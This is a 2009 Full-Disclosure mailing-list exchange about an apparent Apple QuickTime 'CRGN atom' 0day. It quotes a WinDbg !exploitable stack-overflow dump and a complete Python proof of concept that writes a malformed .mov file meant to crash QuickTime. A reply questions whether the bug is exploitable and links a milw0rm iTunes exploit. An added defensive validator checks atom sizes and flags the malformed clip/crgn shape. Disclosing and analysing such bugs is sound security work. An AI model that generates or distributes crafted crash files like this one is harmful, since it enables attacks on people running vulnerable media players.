Date: Mon, 15 Jun 2009 23:18:56 -0400
From: laurent gaffie <laurent.gaffie@...il.com>
To: webDEViL <w3bd3vil@...il.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: Apple QuickTime 0day

Hi WebDEVIL,

You base your PoC on this plugin (http://www.codeplex.com/msecdbg) for
windbg (as copy/pasted), but I wonder, what makes you think it's really
exploitable (on QuickTime)?
Have you tried that PoC on iTunes?
iTunes uses QuickTime as a module to read .mov files, but iTunes doesn't
have the same memory protection as QuickTime; for example, see:
http://milw0rm.com/exploits/7296 , it still works on the last one today
[iTunes 8.2.0.23]

What do you get with your PoC when you play with it on iTunes?

Thanks





2009/6/15 webDEViL <w3bd3vil@...il.com>

> Try it with your latest quicktime player.
> --------------------------------------------------------------
>
> #0:000> !exploitable -v
> #HostMachine\HostUser
> #Executing Processor Architecture is x86
> #Debuggee is in User Mode
> #Debuggee is a live user mode debugging session on the local machine
> #Event Type: Exception
> #Exception Faulting Address: 0x66830f9b
> #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD)
> #
> #Faulting Instruction:66830f9b push ebx
> #
> #Basic Block:
> #    66830f9b push ebx
> #       Tainted Input Operands: ebx
> #    66830f9c push ebp
> #    66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp]
> #    66830fa4 push esi
> #    66830fa5 push edi
> #    66830fa6 mov edi,ecx
> #    66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600)
> #    66830fae mov ebx,edx
> #    66830fb0 mov dword ptr [esp+14h],eax
> #    66830fb4 mov byte ptr [esp+10h],0
> #    66830fb9 mov byte ptr [esp+11h],0
> #    66830fbe mov byte ptr [esp+12h],0
> #    66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
> #
> #Exception Hash (Major/Minor): 0x614b6671.0x614b786e
> #
> #Stack Trace:
> #QuickTime!DllMain+0x2fabb
> #<Unloaded_papi.dll>+0x1231137
> #Instruction Address: 0x66830f9b
> #
> #Description: Stack Overflow
> #Short Description: StackOverflow
> #Exploitability Classification: UNKNOWN
> #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)
>
> print "------------------------------"
> print "w3bd3vil [at] gmail [dot] com"
> print "Apple QuickTime CRGN Atom 0day"
> print "------------------------------"
> bytes = [
> 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
> 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
> 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
> 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,
> 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,
> 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
> 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,
> 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,
> 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
> 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,
> 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,
> 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,
> 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]
>
> f = open("webDEViL.mov", "wb")
> for byte in bytes: f.write("%c" % byte)
> f.close()
> print "webDEViL.mov created! (%d bytes)" % len(bytes)
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
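A defender-side check for the file shape in the quoted PoC, added here as an example and not code from either poster: it walks the atom tree, rejects any atom whose size does not fit its parent, and requires a 'clip' atom to hold a 'crgn' whose region size field fits the atom payload. The samples are constructed, and the region layout (uint16 size followed by a bounding rect) is assumed from the classic QuickDraw Region record.

```python
import struct
# A 'crgn' atom carries a QuickTime Region record: uint16 size, then the bounding rect
# (top, left, bottom, right as int16), so a valid region payload is at least 10 bytes.
REGION_HEADER = struct.Struct(">H4h")
CONTAINERS = {b"moov", b"trak", b"clip", b"edts", b"mdia", b"minf", b"stbl"}

def walk_atoms(buf, start=0, end=None, parent=None):
    """Yield (parent, type, payload) per atom; raise when a size does not fit its parent."""
    end = len(buf) if end is None else end
    pos = start
    while pos < end:
        if end - pos < 8:
            raise ValueError("truncated atom header at offset %d" % pos)
        size, kind = struct.unpack_from(">I4s", buf, pos)
        if size < 8 or pos + size > end:   # sizes 0 and 1 (largesize) are not handled; rejected
            raise ValueError("atom %r at offset %d: size %d does not fit parent" % (kind, pos, size))
        yield parent, kind, buf[pos + 8:pos + size]
        if kind in CONTAINERS:
            yield from walk_atoms(buf, pos + 8, pos + size, kind)
        pos += size

def check_region(payload):
    """Return problems with a region payload: its size field must fit the atom holding it."""
    if len(payload) < 2:
        return ["region payload too short to hold a size field"]
    rgn_size = struct.unpack_from(">H", payload)[0]
    if rgn_size < REGION_HEADER.size or rgn_size > len(payload):
        return ["region size field %d inconsistent with %d-byte payload" % (rgn_size, len(payload))]
    return []

def audit(buf):
    """Return a list of findings for a QuickTime/MP4 buffer (an empty list means clean)."""
    findings = []
    try:
        for parent, kind, payload in walk_atoms(buf):
            if not all(0x20 <= b < 0x7F for b in kind):
                findings.append("non-ASCII atom type %r" % kind)
            if parent == b"clip":          # a clip container should hold exactly one crgn region
                if kind != b"crgn":
                    findings.append("unexpected atom %r inside clip (expected crgn)" % kind)
                findings.extend(check_region(payload))
    except ValueError as e:                # a bad size anywhere aborts the walk: report it
        findings.append(str(e))
    return findings

# Constructed samples (not the posted file): a well-formed clip/crgn pair, and a clip shaped like the
# PoC's: child typed "crg\xff", 6-byte all-0xFF payload (region size 0xFFFF), then 4 stray bytes.
GOOD = b"\x00\x00\x00\x1a" + b"clip" + b"\x00\x00\x00\x12" + b"crgn" + REGION_HEADER.pack(10, 0, 0, 100, 200)
BAD = b"\x00\x00\x00\x1a" + b"clip" + b"\x00\x00\x00\x0e" + b"crg\xff" + b"\xff" * 6 + b"\xff" * 4
```

Running audit(BAD) reports the non-ASCII type, the unexpected child, the 0xFFFF region size and the 4 trailing bytes that cannot form a header, while audit(GOOD) returns an empty list.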
